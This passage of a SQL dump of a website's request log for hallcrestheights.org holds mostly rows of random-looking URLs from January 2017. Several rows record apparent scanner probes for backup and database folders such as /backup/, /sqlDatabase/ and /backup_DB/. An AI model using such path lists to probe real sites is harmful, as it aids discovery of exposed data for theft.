00:00:00'),(3792,'http://www.hallcrestheights.org/fadlaj-fnlgfp-cvwgmy-hdec-wxbdeu-dkovfi-k22776-ibptq-i20162637-uhzxchh-rmxagfp-apuhgf.htm',NULL,'','',1,0,'2017-01-09 11:52:11','0000-00-00 00:00:00'),(3793,'http://www.hallcrestheights.org/k5280-edzvdlqc-omnnm-mcawvbfu-japyvrl-flxh-qjkuh-i20162636-kcmumb-hmgz-nkoheyru-pxpudzik.htm',NULL,'','',1,0,'2017-01-09 11:54:22','0000-00-00 00:00:00'),(3794,'http://www.hallcrestheights.org/k5100-upttmnbe-atgrb-nqcdcncx-rdhcpgz-zdll-i20162635-imvyx-jltfeo-bkeb-wivsmqkr-fbmlkmst.htm',NULL,'','',1,0,'2017-01-09 11:56:32','0000-00-00 00:00:00'),(3795,'http://www.hallcrestheights.org/xhajvqlw-czbi-qsosqxo-qkgqaqyd-cptznzvt-i20162633-k7841-jqoe-vpca-qwjal-uwty-bckbsxb-nbgnnd-orcaj/',NULL,'','',1,0,'2017-01-09 11:58:44','0000-00-00 00:00:00'),(3796,'http://www.hallcrestheights.org/k4380-jgletkym-drqzn-rvmlkswa-zvkecqq-neei-aqjzl-i20162636-nplqfc-nebx-ilnvoxbd-jveebikp.htm',NULL,'','',1,0,'2017-01-09 12:00:54','0000-00-00 00:00:00'),(3797,'http://www.hallcrestheights.org/i20162637-mrcqg-beif-uwgr-abtnwyrq-semgwkow-hmemxg-kucyb-k84-npzkic-vejxk-ulzjcjk-ntsxjln.htm',NULL,'','',1,0,'2017-01-09 12:03:05','0000-00-00 00:00:00'),(3798,'http://www.hallcrestheights.org/mrcqg-beif-uwgr-abtnwyrq-semgwkow-hmemxg-kucyb-i20162633-k84-npzkic-vejxk-ulzjcjk-ntsxjln.htm',NULL,'','',1,0,'2017-01-09 12:05:17','0000-00-00 00:00:00'),(3799,'http://www.hallcrestheights.org/kzpffms-xklrd-edhwge-i20162631-fvbbgz-agpec-k6473-iyyu-wuvfzt-jigjin-amzbcng-tfmly-rghdf-ipwgdqrk/',NULL,'','',1,0,'2017-01-09 12:07:37','0000-00-00 00:00:00'),(3800,'http://www.hallcrestheights.org/k46680-zmkuedtz-jivyo-qxifgxuh-xptvuhm-iwnz-korpv-i20162636-ubfgnq-tpmh-prbikzon-mtlajhol.htm',NULL,'','',1,0,'2017-01-09 12:11:53','0000-00-00 00:00:00'),(3801,'http://www.hallcrestheights.org/k59640-dvisciwb-vwkux-krbzomsm-vuclzup-hvqa-wuoxz-mnpzvs-i20162637-gcrl-ycmczoqq-eludpwcm.htm',NULL,'','',1,0,'2017-01-09 12:14:01','0000-00-00 00:00:00'),(3802,'http://www.hallcrestheights.org/k57120-ixnmueah-whioz-i20162632-hjxbnwpg-eyooayi-kuks-szqce-baqdom-ytni-holbdent-afymluze.htm',NULL,'','',2,0,'2017-01-09 12:16:13','0000-00-00 00:00:00'),(3803,'http://www.hallcrestheights.org/k18240-vqjnyspv-holjp-eurrtpil-uourxiv-lbtr-hnnmt-qzkowt-sxpp-i20162628-bgrrcdsi-kibkxnpf.htm',NULL,'','',1,0,'2017-01-09 12:18:22','0000-00-00 00:00:00'),(3804,'http://www.hallcrestheights.org/k14820-fadlajfn-lgfpc-i20162632-vwgmyhde-cwxbdeu-dkov-fiibp-tquhzx-chhr-mxagfpap-uhgfqvjd.htm',NULL,'','',1,0,'2017-01-09 12:20:33','0000-00-00 00:00:00'),(3805,'http://www.hallcrestheights.org/k35520-upttmnbe-atgrb-i20162632-nqcdcncx-rdhcpgz-zdll-imvyx-jltfeo-bkeb-wivsmqkr-fbmlkmst.htm',NULL,'','',1,0,'2017-01-09 12:27:06','0000-00-00 00:00:00'),(3806,'http://www.hallcrestheights.org/k51720-mrcqgbei-i20162631-fuwgr-abtnwyrq-semgwko-whme-mxgku-cybnpz-kicv-ejxkulzj-cjkntsxj.htm',NULL,'','',1,0,'2017-01-09 12:29:21','0000-00-00 00:00:00'),(3807,'http://www.hallcrestheights.org/k25980-mrcqgbei-fuwgr-abtnwyrq-semgwko-whme-mxgku-i20162636-cybnpz-kicv-ejxkulzj-cjkntsxj.htm',NULL,'','',1,0,'2017-01-09 12:31:33','0000-00-00 00:00:00'),(3808,'http://www.hallcrestheights.org/bsoapaza-psta-sgmhcqc-mckfrdtf-kgpvbchs-k34481-iwho-i20162634-rklv-zrtjr-syoa-ayfwgdx-skmyuk-cmbqr/',NULL,'','',1,0,'2017-01-09 12:33:40','0000-00-00 00:00:00'),(3809,'http://www.hallcrestheights.org/k47400-edzvdlqc-omnnm-mcawvbfu-japyvrl-i20162634-flxh-qjkuh-kcmumb-hmgz-nkoheyru-pxpudzik.htm',NULL,'','',1,0,'2017-01-09 12:40:13','0000-00-00 00:00:00'),(3810,'http://www.hallcrestheights.org/wbwpbonk-ydhx-jjikvfv-i20162631-tzpxbxkc-wjybtylw-k62201-osdu-ieqg-wsogx-hgpi-sdhtnir-mjhvzy-xodbx/',NULL,'','',1,0,'2017-01-09 12:42:25','0000-00-00 00:00:00'),(3811,'http://www.hallcrestheights.org/k37320-zmkuedtz-jivyo-i20162632-qxifgxuh-xptvuhm-iwnz-korpv-ubfgnq-tpmh-prbikzon-mtlajhol.htm',NULL,'','',1,0,'2017-01-09 12:46:45','0000-00-00 00:00:00'),(3812,'http://www.hallcrestheights.org/k16620-mrcqgbei-fuwgr-i20162632-abtnwyrq-semgwko-whme-mxgku-cybnpz-kicv-ejxkulzj-cjkntsxj.htm',NULL,'','',1,0,'2017-01-09 12:51:07','0000-00-00 00:00:00'),(3813,'http://www.hallcrestheights.org/i20162630-gnfz-nxvjxpa-k12732-ltitj-shkyjy-ldpijaa-mdurtaen-pggwtdv-lxtdqkun-fglq-rhzyonxf.htm',NULL,'','',1,0,'2017-01-09 12:53:18','0000-00-00 00:00:00'),(3814,'http://www.hallcrestheights.org/lugd-ltrsmxx-k38292-hypzq-jllzoh-njumnte-cwfogywb-iwyrurf-gvfcwqzh-i20162628-ribn-knyfeebs.htm',NULL,'','',1,0,'2017-01-09 12:55:30','0000-00-00 00:00:00'),(3815,'http://www.hallcrestheights.org/pcsc-qrufunp-k58092-kwxpo-ideotw-tvsoarm-osmgepla-lheliyr-qiyqfufx-i20162628-vugo-wopegtqa.htm',NULL,'','',1,0,'2017-01-09 12:59:52','0000-00-00 00:00:00'),(3816,'http://www.hallcrestheights.org/uptt-mnbeatg-k21012-rbnqc-dcncxr-i20162634-dhcpgzz-dllimvyx-jltfeob-kebwivsm-qkrf-bmlkmsth.htm',NULL,'','',1,0,'2017-01-09 13:02:02','0000-00-00 00:00:00'),(3817,'http://www.hallcrestheights.org/i20162630-dvis-ciwbvwk-k33432-uxkrb-zomsmv-uclzuph-vqawuoxz-mnpzvsg-crlycmcz-oqqe-ludpwcme.htm',NULL,'','',1,0,'2017-01-09 13:04:13','0000-00-00 00:00:00'),(3818,'http://www.hallcrestheights.org/htxwhyk-rsvsv-i20162630-hudykb-qxdosf-ietyu-k56873-aixn-rbdggs-aarhef-skjydmr-ujwim-jqiaa-urihcywn/',NULL,'','',1,0,'2017-01-09 13:08:35','0000-00-00 00:00:00'),(3819,'http://www.hallcrestheights.org/fadl-ajfnlgf-k16692-pcvwg-myhdec-wxbdeud-kovfiibp-tquhzxc-hhrmxagf-i20162628-papu-hgfqvjdc.htm',NULL,'','',1,0,'2017-01-09 13:10:47','0000-00-00 00:00:00'),(3820,'http://www.hallcrestheights.org/vqjn-yspvhol-k36492-jpeur-rtpilu-ourxivl-btrhnnmt-qzkowts-xppbgrrc-i20162628-dsik-ibkxnpfo.htm',NULL,'','',1,0,'2017-01-09 13:12:57','0000-00-00 00:00:00'),(3821,'http://www.hallcrestheights.org/i20162637-dvisc-iwbv-wkux-krbzomsm-vuclzuph-k984-vqawuo-xzmnp-zvsgcr-lycmc-zoqqelu-dpwcmeg.htm',NULL,'','',2,0,'2017-01-09 13:15:08','0000-00-00 00:00:00'),(3822,'http://www.hallcrestheights.org/i20162630-fadl-ajfnlgf-k54132-pcvwg-myhdec-wxbdeud-kovfiibp-tquhzxc-hhrmxagf-papu-hgfqvjdc.htm',NULL,'','',1,0,'2017-01-09 13:17:25','0000-00-00 00:00:00'),(3823,'http://www.hallcrestheights.org/uptt-mnbeatg-k37392-rbnqc-dcncxr-dhcpgzz-dllimvyx-jltfeob-kebwivsm-i20162628-qkrf-bmlkmsth.htm',NULL,'','',1,0,'2017-01-09 13:19:32','0000-00-00 00:00:00'),(3824,'http://www.hallcrestheights.org/cwhriwg-pekzq-i20162630-dwkvum-zbsaii-mjzfo-k36173-zgdv-ddqjvd-obknly-kconedw-jmaxe-vortb-zqsaxidi/',NULL,'','',1,0,'2017-01-09 13:21:46','0000-00-00 00:00:00'),(3825,'http://www.hallcrestheights.org/wbwpbonk-ydhx-jjikvfv-tzpxbxkc-wjybtylw-k55181-osdu-i20162634-ieqg-wsogx-hgpi-sdhtnir-mjhvzy-xodbx/',NULL,'','',1,0,'2017-01-09 13:26:03','0000-00-00 00:00:00'),(3826,'http://www.hallcrestheights.org/pcsc-qrufunp-k41712-kwxpo-ideotw-i20162634-tvsoarm-osmgepla-lheliyr-qiyqfufx-vugo-wopegtqa.htm',NULL,'','',1,0,'2017-01-09 13:30:26','0000-00-00 00:00:00'),(3827,'http://www.hallcrestheights.org/qlbowci-ggece-i20162630-ayafxr-glnikg-hhmbb-k34373-xpge-smrcai-ztbiau-wdtvixp-mtzhz-zwzrq-rdcfpsmf/',NULL,'','',1,0,'2017-01-09 13:32:38','0000-00-00 00:00:00'),(3828,'http://www.hallcrestheights.org/pcscqr-ufunpk-i20162628-wxpoid-eotw-tvsoar-k1776-mosmge-plalh-eliyrqi-yqfufxv-ugowop-egtqamz.htm',NULL,'','',1,0,'2017-01-09 13:34:49','0000-00-00 00:00:00'),(3829,'http://www.hallcrestheights.org/fadla-jfnl-gfpc-k21684-vwgmyhde-cwxbdeud-kovfii-i20162632-bptqu-hzxchh-rmxag-fpapuhg-fqvjdcl.htm',NULL,'','',1,0,'2017-01-09 13:37:02','0000-00-00 00:00:00'),(3830,'http://www.hallcrestheights.org/i20162637-fadla-jfnl-gfpc-k21684-vwgmyhde-cwxbdeud-kovfii-bptqu-hzxchh-rmxag-fpapuhg-fqvjdcl.htm',NULL,'','',1,0,'2017-01-09 13:41:20','0000-00-00 00:00:00'),(3831,'http://www.hallcrestheights.org/vqjny-spvh-oljp-k41484-eurrtpil-uourxivl-btrhnn-mtqzk-owtsxp-pbgrr-cdsikib-i20162636-kxnpfov.htm',NULL,'','',1,0,'2017-01-09 13:45:48','0000-00-00 00:00:00'),(3832,'http://www.hallcrestheights.org/kzpffmsx-klrd-edhwgef-vbbgzagp-eciyyuwu-k56081-vfzt-i20162634-jigj-inamz-bcng-tfmlyrg-hdfipw-gdqrk/',NULL,'','',1,0,'2017-01-09 13:47:54','0000-00-00 00:00:00'),(3833,'http://www.hallcrestheights.org/soegszxy-ifet-i20162630-vtndyuu-hvfcyzls-xxqroxae-k48701-hksk-xyxe-mbuqu-dtwq-ceyvuci-wqwsgf-rvrjo/',NULL,'','',1,0,'2017-01-09 13:50:35','0000-00-00 00:00:00'),(3834,'http://www.hallcrestheights.org/ryvhr-hmqt-yysl-lgeajanp-dmefnxhq-fhjdyh-k53004-aoxrc-jhwuvd-svezy-twlcycw-i20162636-scpuakq.htm',NULL,'','',1,0,'2017-01-09 13:52:20','0000-00-00 00:00:00'),(3835,'http://www.hallcrestheights.org/k59664-lugdl-trsm-xxhy-pzqjllzo-hnjumnte-cwfogy-i20162632-wbiwy-rurfgv-fcwqz-hribnkn-yfeebsb.htm',NULL,'','',1,0,'2017-01-09 13:55:45','0000-00-00 00:00:00'),(3836,'http://www.hallcrestheights.org/jglet-kymd-rqzn-rvmlkswa-zvkecqqn-eeiaqj-zlnpl-qfcneb-k32304-xilnv-oxbdjve-i20162636-ebikptj.htm',NULL,'','',1,0,'2017-01-09 14:01:37','0000-00-00 00:00:00'),(3837,'http://www.hallcrestheights.org/vqjny-spvh-oljp-eurrtpil-k57864-uourxivl-btrhnn-i20162632-mtqzk-owtsxp-pbgrr-cdsikib-kxnpfov.htm',NULL,'','',1,0,'2017-01-09 14:05:21','0000-00-00 00:00:00'),(3838,'http://www.hallcrestheights.org/nfrkopdo-bbum-golzesr-kwtzqtqb-svjcwjbx-i20162633-k28541-nmyv-sssl-djzna-ahjb-kwxrosh-olvgwx-kwoih/',NULL,'','',1,0,'2017-01-09 14:07:47','0000-00-00 00:00:00'),(3839,'http://www.hallcrestheights.org/zmkue-dtzj-ivyo-qxifgxuh-xptvuhmi-wnzkor-k37164-pvubf-i20162633-gnqtpm-hprbi-kzonmtl-ajholjr.htm',NULL,'','',1,0,'2017-01-09 14:10:47','0000-00-00 00:00:00'),(3840,'http://www.hallcrestheights.org/wbwp-i20162629-bonkydh-xjjikvf-vtzpx-bxkcw-k16805-jybtylw-osdu-ieqgwsog-xhgpi-sdhtni-rmjhv-zyxodbx/',NULL,'','',1,0,'2017-01-09 14:12:37','0000-00-00 00:00:00'),(3841,'http://www.hallcrestheights.org/pcscq-rufu-npkw-xpoideot-wtvsoarm-osmgep-lalhe-liyrqi-yqfuf-xvugowo-i20162636-k11604-pegtqam.htm',NULL,'','',1,0,'2017-01-09 14:14:06','0000-00-00 00:00:00'),(3842,'http://www.hallcrestheights.org/dvisc-iwbv-wkux-krbzomsm-vuclzuph-vqawuo-k17364-xzmnp-i20162633-zvsgcr-lycmc-zoqqelu-dpwcmeg.htm',NULL,'','',1,0,'2017-01-09 14:16:23','0000-00-00 00:00:00'),(3843,'http://www.hallcrestheights.org/upttm-nbea-k58764-tgrb-nqcdcncx-rdhcpgzz-dllimv-i20162632-yxjlt-feobke-bwivs-mqkrfbm-lkmstho.htm',NULL,'','',1,0,'2017-01-09 14:18:28','0000-00-00 00:00:00'),(3844,'http://www.hallcrestheights.org/zmkued-tzjivy-oqxifg-xuhx-ptvuhm-iwnzko-rpvub-fgnqtpm-hprbikz-i20162635-onmtla-k20316-jholjrd.htm',NULL,'','',1,0,'2017-01-09 14:20:50','0000-00-00 00:00:00'),(3845,'http://www.hallcrestheights.org/i20162637-edzvdl-k23376-qcomnn-mmcawv-bfuj-apyvrl-flxhqj-kuhkc-mumbhmg-znkohey-rupxpu-dzikmus.htm',NULL,'','',1,0,'2017-01-09 14:24:52','0000-00-00 00:00:00'),(3846,'http://www.hallcrestheights.org/qlbo-i20162629-k30005-wciggec-eayafxr-glnik/',NULL,'','',1,0,'2017-01-09 14:25:00','0000-00-00 00:00:00'),(3847,'http://www.hallcrestheights.org/upttm-nbea-tgrb-nqcdcncx-rdhcpgzz-dllimv-yxjlt-feobke-k21584-bwivs-i20162637-mqkrfbm-lkmstho-wgwh.htm',NULL,'','',1,0,'2017-01-09 14:27:13','0000-00-00 00:00:00'),(3848,'http://www.hallcrestheights.org/xhajvql-k8153-wczbi-qsosqx-i20162631-oqkgqa/',NULL,'','',1,0,'2017-01-09 14:30:15','0000-00-00 00:00:00'),(3849,'http://www.hallcrestheights.org/dvisci-wbvwku-xkrbzo-msmv-uclzup-hvqawu-i20162634-oxzmn-pzvsgcr-k61616-lycmczo-qqelud-pwcmegi-apxm.htm',NULL,'','',1,0,'2017-01-09 14:31:37','0000-00-00 00:00:00'),(3850,'http://www.hallcrestheights.org/gnfznx-vjxpal-titjsh-kyjy-ldpija-amdurt-i20162634-aenpg-gwtdvlx-k40916-tdqkunf-glqrhz-yonxfeq-nzsv.htm',NULL,'','',1,0,'2017-01-09 14:33:54','0000-00-00 00:00:00'),(3851,'http://hallcrestheights.org/backup/',NULL,'http://hallcrestheights.org/','',3,0,'2017-01-09 14:34:20','0000-00-00 00:00:00'),(3852,'http://hallcrestheights.org/database/',NULL,'http://hallcrestheights.org/','',3,0,'2017-01-09 14:34:22','0000-00-00 00:00:00'),(3853,'http://hallcrestheights.org/data/SQL/',NULL,'http://hallcrestheights.org/','',2,0,'2017-01-09 14:34:29','0000-00-00 00:00:00'),(3854,'http://hallcrestheights.org/sqlDatabase/',NULL,'http://hallcrestheights.org/','',2,0,'2017-01-09 14:34:30','0000-00-00 00:00:00'),(3855,'http://hallcrestheights.org/db1/',NULL,'http://hallcrestheights.org/','',2,0,'2017-01-09 14:34:38','0000-00-00 00:00:00'),(3856,'http://hallcrestheights.org/_database/',NULL,'http://hallcrestheights.org/','',2,0,'2017-01-09 14:34:41','0000-00-00 00:00:00'),(3857,'http://hallcrestheights.org/back-up/',NULL,'http://hallcrestheights.org/','',2,0,'2017-01-09 14:34:41','0000-00-00 00:00:00'),(3858,'http://hallcrestheights.org/uploads/',NULL,'http://hallcrestheights.org/','',2,0,'2017-01-09 14:34:42','0000-00-00 00:00:00'),(3859,'http://hallcrestheights.org/data/',NULL,'http://hallcrestheights.org/','',3,0,'2017-01-09 14:34:50','0000-00-00 00:00:00'),(3860,'http://hallcrestheights.org/_sql/',NULL,'http://hallcrestheights.org/','',2,0,'2017-01-09 14:34:53','0000-00-00 00:00:00'),(3861,'http://hallcrestheights.org/backup_DB/',NULL,'http://hallcrestheights.org/','',2,0,'2017-01-09 14:34:54','0000-00-00 00:00:00'),(3862,'http://www.hallcrestheights.org/wbwp-k26945-bonkydh-i20162630-xjjikvf-vtzpx/',NULL,'','',1,0,'2017-01-09 14:36:07','0000-00-00 00:00:00'),(3863,'http://hallcrestheights.org/archive/',NULL,'http://hallcrestheights.org/','',2,0,'2017-01-09 14:36:20','0000-00-00 00:00:00'),(3864,'http://www.hallcrestheights.org/zmkued-tzjivy-oqxifg-xuhx-ptvuhm-iwnzko-rpvub-fgnqtpm-k43976-hprbikz-i20162637-onmtla-jholjrd-klts.htm',NULL,'','',1,0,'2017-01-09 14:39:18','0000-00-00 00:00:00'),(3865,'http://www.hallcrestheights.org/i20162632-yembjv-k50489-htqqdckz-fltz-terqb/',NULL,'','',1,0,'2017-01-09 14:40:47','0000-00-00 00:00:00'),(3866,'http://www.hallcrestheights.org/vqjnys-pvholj-peurrt-pilu-ourxiv-lbtrhn-nmtqz-i20162635-kowtsxp-k20216-pbgrrcd-sikibk-xnpfovp-yayb.htm',NULL,'','',1,0,'2017-01-09 14:42:41','0000-00-00 00:00:00'),(3867,'http://www.hallcrestheights.org/mrcq-gbeifuw-i20162628-grabt-nwyrqs-emgwkow-hmemxgku-cybnpzk-icvejxku-lzjc-k37992-jkntsxjl-nuuuvtff.htm',NULL,'','',1,0,'2017-01-09 14:44:51','0000-00-00 00:00:00'),(3868,'http://www.hallcrestheights.org/bsoa-i20162629-k27305-pazapst-asgmhcq-cmckf/',NULL,'','',1,0,'2017-01-09 14:51:30','0000-00-00 00:00:00'),(3869,'http://www.hallcrestheights.org/k37092-ryvh-rhmqtyy-i20162628-sllge-ajanpd-mefnxhq-fhjdyhao-xrcjhwu-vdsvezyt-wlcy-cwscpuak-qnjtnply.htm',NULL,'','',1,0,'2017-01-09 14:51:37','0000-00-00 00:00:00'),(3870,'http://www.hallcrestheights.org/vqjn-yspvhol-jpeur-rtpilu-k63012-ourxivl-btrhnnmt-qzkowts-i20162633-xppbgrrc-dsik-ibkxnpfo-vpyaybgo.htm',NULL,'','',1,0,'2017-01-09 14:53:30','0000-00-00 00:00:00'),(3871,'http://www.hallcrestheights.org/zmku-edtzjiv-yoqxi-fgxuhx-ptvuhmi-wnzkorpv-k42312-ubfgnqt-pmhprbik-i20162634-zonm-tlajholj-rdkltsqw.htm',NULL,'','',1,0,'2017-01-09 14:56:02','0000-00-00 00:00:00'),(3872,'http://www.hallcrestheights.org/k33132-pcsc-qrufunp-kwxpo-ideotw-i20162630-tvsoarm-osmgepla-lheliyr-qiyqfufx-vugo-wopegtqa-mzimczjv.htm',NULL,'','',1,0,'2017-01-09 14:59:05','0000-00-00 00:00:00'),(3873,'http://www.hallcrestheights.org/wbwp-i20162629-k48005-bonkydh-xjjikvf-vtzpx/',NULL,'','',1,0,'2017-01-09 15:00:32','0000-00-00 00:00:00'),(3874,'http://www.hallcrestheights.org/ryvh-rhmqtyy-sllge-ajanpd-mefnxhq-fhjdyhao-xrcjhwu-vdsvezyt-i20162634-wlcy-cwscpuak-k20712-qnjtnply.htm',NULL,'','',1,0,'2017-01-09 15:03:27','0000-00-00 00:00:00'),(3875,'http://www.hallcrestheights.org/uptt-mnbeatg-k12432-rbnqc-dcncxr-i20162630-dhcpgzz-dllimvyx-jltfeob-kebwivsm-qkrf-bmlkmsth-owgwhlkj.htm',NULL,'','',1,0,'2017-01-09 15:06:18','0000-00-00 00:00:00'),(3876,'http://www.hallcrestheights.org/xhaj-i20162629-k26405-vqlwczb-iqsosqx-oqkgq/',NULL,'','',1,0,'2017-01-09 15:07:00','0000-00-00 00:00:00'),(3877,'http://www.hallcrestheights.org/lugd-ltrsmxx-i20162628-hypzq-jllzoh-njumnte-cwfogywb-iwyrurf-gvfcwqzh-ribn-k57792-knyfeebs-bjhfkwet.htm',NULL,'','',1,0,'2017-01-09 15:09:51','0000-00-00 00:00:00'),(3878,'http://www.hallcrestheights.org/bsoa-i20162629-k50705-pazapst-asgmhcq-cmckf/',NULL,'','',1,0,'2017-01-09 15:13:26','0000-00-00 00:00:00'),(3879,'http://www.hallcrestheights.org/jgle-tkymdrq-i20162628-k16392-znrvm-lkswaz-vkecqqn-eeiaqjzl-nplqfcn-ebxilnvo-xbdj-veebikpt-jvlxfaye.htm',NULL,'','',1,0,'2017-01-09 15:13:53','0000-00-00 00:00:00'),(3880,'http://www.hallcrestheights.org/jgle-tkymdrq-znrvm-lkswaz-i20162630-vkecqqn-eeiaqjzl-nplqfcn-ebxilnvo-xbdj-k53832-veebikpt-jvlxfaye.htm',NULL,'','',1,0,'2017-01-09 15:16:48','0000-00-00 00:00:00'),(3881,'http://www.hallcrestheights.org/lugd-ltrsmxx-hypzq-jllzoh-njumnte-cwfogywb-iwyrurf-gvfcwqzh-i20162634-k41412-ribn-knyfeebs-bjhfkwet.htm',NULL,'','',1,0,'2017-01-09 15:19:06','0000-00-00 00:00:00'),(3882,'http://www.hallcrestheights.org/zmku-edtzjiv-i20162628-yoqxi-fgxuhx-ptvuhmi-wnzkorpv-ubfgnqt-k58692-pmhprbik-zonm-tlajholj-rdkltsqw.htm',NULL,'','',1,0,'2017-01-09 15:19:37','0000-00-00 00:00:00'),(3883,'http://www.hallcrestheights.org/bsoapaz-k9053-apsta-sgmhcq-i20162631-cmckfr/',NULL,'','',1,0,'2017-01-09 15:24:55','0000-00-00 00:00:00'),(3884,'http://www.hallcrestheights.org/gnfznxvj-xpalt-itjshkyj-yldpija-amdu-rtaen-pggwtd-vlxt-i20162636-k4880-dqkunfgl-qrhzyonx-feqnzs-vvbpzw.htm',NULL,'','',1,0,'2017-01-09 15:26:52','0000-00-00 00:00:00'),(3885,'http://www.hallcrestheights.org/vqjnyspv-holjp-eurrtpil-uourxiv-i20162632-lbtr-hnnmt-qzkowt-sxpp-k56720-bgrrcdsi-kibkxnpf-ovpyay-bgoynk.htm',NULL,'','',1,0,'2017-01-09 15:28:41','0000-00-00 00:00:00'),(3886,'http://www.hallcrestheights.org/dvisciwb-vwkux-krbzomsm-vuclzup-hvqa-wuoxz-mnpzvs-gcrl-i20162636-k25580-ycmczoqq-eludpwcm-egiapx-mxikii.htm',NULL,'','',2,0,'2017-01-09 15:36:40','0000-00-00 00:00:00'),(3887,'http://www.hallcrestheights.org/inquiry/faq.html',NULL,'','',7,0,'2017-01-09 15:48:34','0000-00-00 00:00:00'),(3888,'http://www.hallcrestheights.org/fadlajfn-lgfpc-vwgmyhde-cwxbdeu-i20162632-dkov-fiibp-tquhzx-chhr-k36920-mxagfpap-uhgfqvjd-clbbvz-grcmdf.htm',NULL,'','',1,0,'2017-01-09 15:58:12','0000-00-00 00:00:00'),(3889,'http://www.hallcrestheights.org/i20162628-upttmnbe-atgrb-nqcdcncx-rdhcpgz-zdll-imvyx-jltfeo-bkeb-k17840-wivsmqkr-fbmlkmst-howgwh-lkjlbm.htm',NULL,'','',1,0,'2017-01-09 16:00:05','0000-00-00 00:00:00'),(3890,'http://www.hallcrestheights.org/yembjv-i20162629-k36449-htqqdckz-fltz-terqb/',NULL,'','',2,0,'2017-01-09 16:03:33','0000-00-00 00:00:00'),(3891,'http://www.hallcrestheights.org/gnfznxvj-xpalt-itjshkyj-yldpija-amdu-rtaen-i20162634-pggwtd-vlxt-k47000-dqkunfgl-qrhzyonx-feqnzs-vvbpzw.htm',NULL,'','',1,0,'2017-01-09 16:08:31','0000-00-00 00:00:00'),(3892,'http://www.hallcrestheights.org/lugdltrs-mxxhy-pzqjllzo-hnjumnt-i20162632-ecwf-ogywb-iwyrur-fgvf-k35120-cwqzhrib-nknyfeeb-sbjhfk-wetbro.htm',NULL,'','',1,0,'2017-01-09 16:11:54','0000-00-00 00:00:00'),(3893,'http://www.hallcrestheights.org/nfrk-i20162629-k47105-opdobbu-mgolzes-rkwtz/',NULL,'','',2,0,'2017-01-09 16:17:11','0000-00-00 00:00:00'),(3894,'http://www.hallcrestheights.org/pcscqr-k40516-ufunpk-wxpoid-eotw-i20162634-tvsoar.htm',NULL,'','',1,0,'2017-01-09 16:28:06','0000-00-00 00:00:00'),(3895,'http://www.hallcrestheights.org/fadlajfn-lgfpc-vwgmyhde-cwxbdeu-dkov-fiibp-tquhzx-chhr-i20162636-k46280-mxagfpap-uhgfqvjd-clbbvz-grcmdf.htm',NULL,'','',1,0,'2017-01-09 16:32:40','0000-00-00 00:00:00'),(3896,'http://www.hallcrestheights.org/ryvhrhmq-tyysl-lgeajanp-dmefnxh-i20162632-qfhj-dyhao-xrcjhw-uvds-k14420-vezytwlc-ycwscpua-kqnjtn-plyjup.htm',NULL,'','',2,0,'2017-01-09 16:34:33','0000-00-00 00:00:00'),(3897,'http://www.hallcrestheights.org/i20162628-ryvh-rhmqtyy-sllge-ajanpd-mefnxhq-fhjdyhao-xrcjhwu-vdsvezyt-k16292-wlcy-cwscpuak-qnjtnply-jupsujj.htm',NULL,'','',1,0,'2017-01-09 16:38:30','0000-00-00 00:00:00'),(3898,'http://www.hallcrestheights.org/soeg-i20162629-k48545-szxyife-tvtndyu-uhvfc/',NULL,'','',2,0,'2017-01-09 16:45:56','0000-00-00 00:00:00'),(3899,'http://www.hallcrestheights.org/i20162628-vqjn-yspvhol-jpeur-rtpilu-ourxivl-btrhnnmt-qzkowts-xppbgrrc-k58592-dsik-ibkxnpfo-vpyaybgo-ynkxnoq.htm',NULL,'','',1,0,'2017-01-09 16:48:20','0000-00-00 00:00:00'),(3900,'http://www.hallcrestheights.org/ryvh-rhmqtyy-i20162630-sllge-ajanpd-mefnxhq-fhjdyhao-xrcjhwu-vdsvezyt-k53732-wlcy-cwscpuak-qnjtnply-jupsujj.htm',NULL,'','',2,0,'2017-01-09 16:50:50','0000-00-00 00:00:00'),(3901,'http://www.hallcrestheights.org/ixnm-ueahwhi-ozhjx-bnwpge-yooayik-uksszqce-i20162634-baqdomy-tniholbd-k41312-enta-fymluzex-tlfggcsd-imrmqfn.htm',NULL,'','',1,0,'2017-01-09 16:57:30','0000-00-00 00:00:00'),(3902,'http://www.hallcrestheights.org/kzpffms-k7253-xklrd-edhwge-i20162631-fvbbgz/',NULL,'','',1,0,'2017-01-09 16:58:21','0000-00-00 00:00:00'),(3903,'http://www.hallcrestheights.org/i20162628-ixnm-ueahwhi-ozhjx-bnwpge-yooayik-uksszqce-baqdomy-tniholbd-k57692-enta-fymluzex-tlfggcsd-imrmqfn.htm',NULL,'','',2,0,'2017-01-09 16:58:30','0000-00-00 00:00:00'),(3904,'http://www.hallcrestheights.org/vqjn-yspvhol-jpeur-rtpilu-ourxivl-btrhnnmt-i20162634-qzkowts-xppbgrrc-k42212-dsik-ibkxnpfo-vpyaybgo-ynkxnoq.htm',NULL,'','',1,0,'2017-01-09 16:59:03','0000-00-00 00:00:00'),(3905,'http://www.hallcrestheights.org/jgle-tkymdrq-i20162630-znrvm-lkswaz-vkecqqn-eeiaqjzl-nplqfcn-ebxilnvo-k33032-xbdj-veebikpt-jvlxfaye-ayabopl.htm',NULL,'','',1,0,'2017-01-09 17:00:06','0000-00-00 00:00:00'),(3906,'http://www.hallcrestheights.org/i20162628-lugd-ltrsmxx-hypzq-jllzoh-njumnte-cwfogywb-iwyrurf-gvfcwqzh-k36992-ribn-knyfeebs-bjhfkwet-brovflt.htm',NULL,'','',1,0,'2017-01-09 17:01:13','0000-00-00 00:00:00'),(3907,'http://www.hallcrestheights.org/lugd-ltrsmxx-hypzq-jllzoh-njumnte-cwfogywb-i20162634-iwyrurf-gvfcwqzh-k20612-ribn-knyfeebs-bjhfkwet-brovflt.htm',NULL,'','',1,0,'2017-01-09 17:01:56','0000-00-00 00:00:00'),(3908,'http://www.hallcrestheights.org/gnfz-nxvjxpa-ltitj-shkyjy-ldpijaa-i20162633-mdurtaen-pggwtdv-lxtdqkun-k62912-fglq-rhzyonxf-eqnzsvvb-pzwdhkv.htm',NULL,'','',1,0,'2017-01-09 17:05:03','0000-00-00 00:00:00'),(3909,'http://www.hallcrestheights.org/oiyizgo-k56753-lrcmw-i20162630-fbsnop-dgfnhs/',NULL,'','',2,0,'2017-01-09 17:13:44','0000-00-00 00:00:00'),(3910,'http://www.hallcrestheights.org/i20162628-zmku-edtzjiv-yoqxi-fgxuhx-ptvuhmi-wnzkorpv-ubfgnqt-pmhprbik-k37892-zonm-tlajholj-rdkltsqw-xxuijhd.htm',NULL,'','',1,0,'2017-01-09 17:17:07','0000-00-00 00:00:00'),(3911,'http://www.hallcrestheights.org/htxwhyk-k57653-rsvsv-i20162630-hudykb-qxdosf/',NULL,'','',1,0,'2017-01-09 17:18:52','0000-00-00 